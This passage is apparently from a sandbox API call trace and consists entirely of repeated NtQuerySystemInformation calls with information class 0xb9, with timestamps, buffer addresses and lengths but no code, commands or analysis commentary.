Length=0x38, ResultLength=0x0) [0224.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.279] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.280] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.281] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.282] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.283] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.284] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.285] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.286] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.287] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.288] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.289] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.290] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.291] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.292] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.293] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.294] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.295] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.296] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.297] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.298] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.299] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.300] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.301] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.302] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.303] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.304] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.305] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.306] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.307] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.308] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.309] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.310] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.311] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.515] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.516] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fedb0, Length=0x38, ResultLength=0x0) [0224.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.517] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.518] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.519] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.520] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.521] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fecd0, Length=0x38, ResultLength=0x0) [0224.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.522] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a69fee90, Length=0x40, ResultLength=0x0) [0224.600] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.601] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.602] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.603] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.604] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.605] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.606] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.607] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.608] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.609] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.610] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0224.610] 